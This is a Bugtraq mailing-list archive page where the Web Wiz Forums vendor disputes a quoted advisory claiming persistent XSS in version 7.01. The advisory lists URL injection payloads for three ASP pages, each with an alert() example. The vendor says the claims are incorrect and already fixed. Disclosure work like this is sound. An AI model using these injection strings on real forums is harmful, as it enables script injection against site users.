Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Web Wiz Forums ver. 7.01

From: <bruce () webwizguide info>
Date: 22 Oct 2003 17:43:54 -0000
In-Reply-To: <18150849207.20031022004135 () hex net ru>


Received: (qmail 24988 invoked from network); 21 Oct 2003 22:17:00 -0000
Received: from outgoing3.securityfocus.com (205.206.231.27)
 by mail.securityfocus.com with SMTP; 21 Oct 2003 22:17:00 -0000
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
      by outgoing3.securityfocus.com (Postfix) with QMQP
      id D98A8A30C6; Tue, 21 Oct 2003 16:22:51 -0600 (MDT)
Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq () securityfocus com>
List-Help: <mailto:bugtraq-help () securityfocus com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com>
List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com>
Delivered-To: mailing list bugtraq () securityfocus com
Delivered-To: moderator for bugtraq () securityfocus com
Received: (qmail 27315 invoked from network); 21 Oct 2003 14:38:48 -0000
Date: Wed, 22 Oct 2003 00:41:35 +0400
From: HEX <hex () hex net ru>
X-Mailer: The Bat! (v2.00)         CD5BF9353B3B7091
Reply-To: HEX <hex () hex net ru>
X-Priority: 3 (Normal)
Message-ID: <18150849207.20031022004135 () hex net ru>
To: bugtraq () securityfocus com, info () webwizguide info
Subject: Web Wiz Forums ver. 7.01
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Informations :
°°°°°°°°°°°°
Language : ASP
Bugged Version : Web Wiz Forums ver. 7.01 (and less ?)
Patched version : none
Website : http://www.webwizforums.com
Problems : Permanent XSS

Objects :
°°°°°°°
- forum_members.asp
- members.asp

- pm_buddy_list.asp

Exploits :
°°°°°°°°
http://[TARGET]/forum_members.asp?find=%22;}[CODE];function%20x(){v%20=%22

Example: http://[TARGET]/forum_members.asp?find=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22

http://[TARGET]/members.asp?SF=%22;}[CODE]function%20x(){v%20=%22

Example: http://[TARGET]/members.asp?SF=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22

http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E[CODE]%3Ca%20s=%22&code=1

Example: http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E&lt;SCRIPT&gt;ALERT('XSS atack by [HEX] (c) 
[CSL]');&lt;/SCRIPT&gt;%3Ca%20s=%22&code=1

Patch/More Details :
°°°°°°°°°°°°°°°°°°
Waiting for the patch at http://www.webwizforums.com...


[ Local time 2:30    | Åñëè á ìèøêè áûëè ï÷åëàìè... ]
[ Copyright by [HEX] | mailto:hex () hex net ru ]




This infomation is incorrect. Not only does Web Wiz Forums 7.01 not contain a file called forum_members.asp, but this 
minor XXS issue was resolved more than 6 months ago and doesn't effect the latest version which is in version 7.5
Previous By Date Next
Previous By Thread Next

Current thread: